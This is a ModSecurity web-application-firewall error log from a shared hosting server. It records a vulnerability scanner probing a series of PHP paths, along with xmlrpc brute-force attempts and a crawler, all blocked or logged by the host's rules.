[Tue May 26 16:51:34.921768 2026] [security2:error] [pid 823496:tid 823743] [client 20.206.111.203:6021] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/bthil.php"] [unique_id "ahWCPpa08mrtyBNpA4PlPwAAAHM"]
[Tue May 26 16:51:34.921895 2026] [security2:error] [pid 823496:tid 823743] [client 20.206.111.203:6021] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/bthil.php"] [unique_id "ahWCPpa08mrtyBNpA4PlPwAAAHM"]
[Tue May 26 16:51:34.994577 2026] [security2:error] [pid 823496:tid 823672] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCPZa08mrtyBNpA4PlJgAAACw"]
[Tue May 26 16:51:35.317316 2026] [security2:error] [pid 823496:tid 823695] [client 20.206.111.203:6032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/7.php"] [unique_id "ahWCP5a08mrtyBNpA4PlRAAAAEM"]
[Tue May 26 16:51:35.317453 2026] [security2:error] [pid 823496:tid 823695] [client 20.206.111.203:6032] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/7.php"] [unique_id "ahWCP5a08mrtyBNpA4PlRAAAAEM"]
[Tue May 26 16:51:35.683180 2026] [security2:error] [pid 823496:tid 823654] [client 20.206.111.203:6041] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/8.php"] [unique_id "ahWCP5a08mrtyBNpA4PlSAAAABo"]
[Tue May 26 16:51:35.683289 2026] [security2:error] [pid 823496:tid 823654] [client 20.206.111.203:6041] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/8.php"] [unique_id "ahWCP5a08mrtyBNpA4PlSAAAABo"]
[Tue May 26 16:51:36.064509 2026] [security2:error] [pid 817651:tid 817856] [client 20.206.111.203:5960] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahWCQNlGRCPPN1dS2y3CVgAAANA"]
[Tue May 26 16:51:36.064607 2026] [security2:error] [pid 817651:tid 817856] [client 20.206.111.203:5960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahWCQNlGRCPPN1dS2y3CVgAAANA"]
[Tue May 26 16:51:36.064704 2026] [security2:error] [pid 817651:tid 817856] [client 20.206.111.203:5960] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahWCQNlGRCPPN1dS2y3CVgAAANA"]
[Tue May 26 16:51:36.379480 2026] [security2:error] [pid 823496:tid 823634] [client 117.198.37.168:56079] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCQJa08mrtyBNpA4PlVgAAAAY"]
[Tue May 26 16:51:36.379609 2026] [security2:error] [pid 823496:tid 823634] [client 117.198.37.168:56079] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCQJa08mrtyBNpA4PlVgAAAAY"]
[Tue May 26 16:51:36.486032 2026] [security2:error] [pid 823496:tid 823719] [client 20.206.111.203:6039] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/100.php"] [unique_id "ahWCQJa08mrtyBNpA4PlVwAAAFs"]
[Tue May 26 16:51:36.486135 2026] [security2:error] [pid 823496:tid 823719] [client 20.206.111.203:6039] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/100.php"] [unique_id "ahWCQJa08mrtyBNpA4PlVwAAAFs"]
[Tue May 26 16:51:36.838365 2026] [security2:error] [pid 823496:tid 823678] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCP5a08mrtyBNpA4PlSgAAADI"]
[Tue May 26 16:51:36.895397 2026] [security2:error] [pid 823496:tid 823673] [client 20.206.111.203:5988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahWCQJa08mrtyBNpA4PlXAAAAC0"]
[Tue May 26 16:51:36.895553 2026] [security2:error] [pid 823496:tid 823673] [client 20.206.111.203:5988] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahWCQJa08mrtyBNpA4PlXAAAAC0"]
[Tue May 26 16:51:37.399879 2026] [security2:error] [pid 823496:tid 823744] [client 20.206.111.203:6106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahWCQZa08mrtyBNpA4PlZgAAAHQ"]
[Tue May 26 16:51:37.399985 2026] [security2:error] [pid 823496:tid 823744] [client 20.206.111.203:6106] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahWCQZa08mrtyBNpA4PlZgAAAHQ"]
[Tue May 26 16:51:37.814930 2026] [security2:error] [pid 823496:tid 823636] [client 20.206.111.203:6054] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahWCQZa08mrtyBNpA4PlcgAAAAg"]
[Tue May 26 16:51:37.815118 2026] [security2:error] [pid 823496:tid 823636] [client 20.206.111.203:6054] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahWCQZa08mrtyBNpA4PlcgAAAAg"]
[Tue May 26 16:51:38.218287 2026] [security2:error] [pid 823496:tid 823659] [client 20.206.111.203:6026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-content/admin.php"] [unique_id "ahWCQpa08mrtyBNpA4PldgAAAB8"]
[Tue May 26 16:51:38.218434 2026] [security2:error] [pid 823496:tid 823659] [client 20.206.111.203:6026] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-content/admin.php"] [unique_id "ahWCQpa08mrtyBNpA4PldgAAAB8"]
[Tue May 26 16:51:38.653805 2026] [security2:error] [pid 817651:tid 817827] [client 20.206.111.203:6108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/f6.php"] [unique_id "ahWCQtlGRCPPN1dS2y3CYwAAALM"]
[Tue May 26 16:51:38.653921 2026] [security2:error] [pid 817651:tid 817827] [client 20.206.111.203:6108] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/f6.php"] [unique_id "ahWCQtlGRCPPN1dS2y3CYwAAALM"]
[Tue May 26 16:51:38.981064 2026] [security2:error] [pid 823496:tid 823684] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCQZa08mrtyBNpA4PlaQAAADg"]
[Tue May 26 16:51:39.061102 2026] [security2:error] [pid 817651:tid 817786] [client 20.206.111.203:6112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahWCQ9lGRCPPN1dS2y3CawAAAIo"]
[Tue May 26 16:51:39.061226 2026] [security2:error] [pid 817651:tid 817786] [client 20.206.111.203:6112] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahWCQ9lGRCPPN1dS2y3CawAAAIo"]
[Tue May 26 16:51:39.434831 2026] [security2:error] [pid 817651:tid 817879] [client 20.206.111.203:5958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahWCQ9lGRCPPN1dS2y3CbQAAAOc"]
[Tue May 26 16:51:39.435004 2026] [security2:error] [pid 817651:tid 817879] [client 20.206.111.203:5958] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahWCQ9lGRCPPN1dS2y3CbQAAAOc"]
[Tue May 26 16:51:39.926259 2026] [security2:error] [pid 823496:tid 823644] [client 20.206.111.203:6027] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahWCQ5a08mrtyBNpA4PlkwAAABA"]
[Tue May 26 16:51:39.926409 2026] [security2:error] [pid 823496:tid 823644] [client 20.206.111.203:6027] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahWCQ5a08mrtyBNpA4PlkwAAABA"]
[Tue May 26 16:51:40.394778 2026] [security2:error] [pid 823496:tid 823738] [client 20.206.111.203:6043] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-content/themes/index.php"] [unique_id "ahWCRJa08mrtyBNpA4PllwAAAG4"]
[Tue May 26 16:51:40.394896 2026] [security2:error] [pid 823496:tid 823738] [client 20.206.111.203:6043] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-content/themes/index.php"] [unique_id "ahWCRJa08mrtyBNpA4PllwAAAG4"]
[Tue May 26 16:51:40.801433 2026] [security2:error] [pid 817651:tid 817884] [client 20.206.111.203:5972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-blog.php"] [unique_id "ahWCRNlGRCPPN1dS2y3CeAAAAOw"]
[Tue May 26 16:51:40.801593 2026] [security2:error] [pid 817651:tid 817884] [client 20.206.111.203:5972] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-blog.php"] [unique_id "ahWCRNlGRCPPN1dS2y3CeAAAAOw"]
[Tue May 26 16:51:41.182077 2026] [security2:error] [pid 823496:tid 823746] [client 20.206.111.203:5952] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-includes/js/jquery/"] [unique_id "ahWCRZa08mrtyBNpA4PlpAAAAHY"]
[Tue May 26 16:51:41.255176 2026] [security2:error] [pid 823496:tid 823691] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCQ5a08mrtyBNpA4PljAAAAD8"]
[Tue May 26 16:51:41.775152 2026] [security2:error] [pid 823496:tid 823715] [client 20.206.111.203:6097] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCRZa08mrtyBNpA4PlrgAAAFc"]
[Tue May 26 16:51:41.957708 2026] [security2:error] [pid 823496:tid 823683] [client 20.206.111.203:5952] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-content/admin.php"] [unique_id "ahWCRZa08mrtyBNpA4PlsgAAADc"]
[Tue May 26 16:51:41.957824 2026] [security2:error] [pid 823496:tid 823683] [client 20.206.111.203:5952] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-content/admin.php"] [unique_id "ahWCRZa08mrtyBNpA4PlsgAAADc"]
[Tue May 26 16:51:42.488820 2026] [security2:error] [pid 823496:tid 823705] [client 20.206.111.203:6125] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahWCRpa08mrtyBNpA4PltwAAAE0"]
[Tue May 26 16:51:42.488927 2026] [security2:error] [pid 823496:tid 823705] [client 20.206.111.203:6125] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahWCRpa08mrtyBNpA4PltwAAAE0"]
[Tue May 26 16:51:42.710746 2026] [security2:error] [pid 823496:tid 823659] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCRZa08mrtyBNpA4PlqgAAAB8"]
[Tue May 26 16:51:42.753933 2026] [security2:error] [pid 823496:tid 823723] [client 114.119.148.132:64961] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.dgssi.in"] [uri "/oscsi_photogallery.htm"] [unique_id "ahWCRpa08mrtyBNpA4PlvAAAAF8"], referer: http://www.dgssi.in/oscsi_photogallery.htm
[Tue May 26 16:51:42.883010 2026] [security2:error] [pid 817651:tid 817842] [client 20.206.111.203:6023] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahWCRtlGRCPPN1dS2y3CjAAAAMI"]
[Tue May 26 16:51:42.883108 2026] [security2:error] [pid 817651:tid 817842] [client 20.206.111.203:6023] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahWCRtlGRCPPN1dS2y3CjAAAAMI"]
[Tue May 26 16:51:43.003140 2026] [security2:error] [pid 817651:tid 817788] [client 20.195.182.1:4296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWCRtlGRCPPN1dS2y3CjgAAAIw"]
[Tue May 26 16:51:43.003310 2026] [security2:error] [pid 817651:tid 817788] [client 20.195.182.1:4296] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWCRtlGRCPPN1dS2y3CjgAAAIw"]
[Tue May 26 16:51:43.279787 2026] [security2:error] [pid 823496:tid 823660] [client 20.206.111.203:5976] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahWCR5a08mrtyBNpA4PlwAAAACA"]
[Tue May 26 16:51:43.279905 2026] [security2:error] [pid 823496:tid 823660] [client 20.206.111.203:5976] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahWCR5a08mrtyBNpA4PlwAAAACA"]
[Tue May 26 16:51:43.358650 2026] [security2:error] [pid 823496:tid 823642] [client 20.195.182.1:4347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/166.php"] [unique_id "ahWCR5a08mrtyBNpA4PlwwAAAA4"]
[Tue May 26 16:51:43.358753 2026] [security2:error] [pid 823496:tid 823642] [client 20.195.182.1:4347] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/166.php"] [unique_id "ahWCR5a08mrtyBNpA4PlwwAAAA4"]
[Tue May 26 16:51:43.692489 2026] [security2:error] [pid 823496:tid 823720] [client 20.206.111.203:6031] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/222.php"] [unique_id "ahWCR5a08mrtyBNpA4PlzgAAAFw"]
[Tue May 26 16:51:43.692605 2026] [security2:error] [pid 823496:tid 823720] [client 20.206.111.203:6031] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/222.php"] [unique_id "ahWCR5a08mrtyBNpA4PlzgAAAFw"]
[Tue May 26 16:51:43.710053 2026] [security2:error] [pid 823496:tid 823634] [client 20.195.182.1:4302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/ups.php"] [unique_id "ahWCR5a08mrtyBNpA4PlzwAAAAY"]
[Tue May 26 16:51:43.710128 2026] [security2:error] [pid 823496:tid 823634] [client 20.195.182.1:4302] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/ups.php"] [unique_id "ahWCR5a08mrtyBNpA4PlzwAAAAY"]
[Tue May 26 16:51:44.063455 2026] [security2:error] [pid 823496:tid 823708] [client 20.195.182.1:4228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/file5.php"] [unique_id "ahWCSJa08mrtyBNpA4Pl0AAAAFA"]
[Tue May 26 16:51:44.063579 2026] [security2:error] [pid 823496:tid 823708] [client 20.195.182.1:4228] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/file5.php"] [unique_id "ahWCSJa08mrtyBNpA4Pl0AAAAFA"]
[Tue May 26 16:51:44.137473 2026] [security2:error] [pid 817651:tid 817845] [client 20.206.111.203:5983] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-bin/index.php"] [unique_id "ahWCSNlGRCPPN1dS2y3CmQAAAMU"]
[Tue May 26 16:51:44.137579 2026] [security2:error] [pid 817651:tid 817845] [client 20.206.111.203:5983] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-bin/index.php"] [unique_id "ahWCSNlGRCPPN1dS2y3CmQAAAMU"]
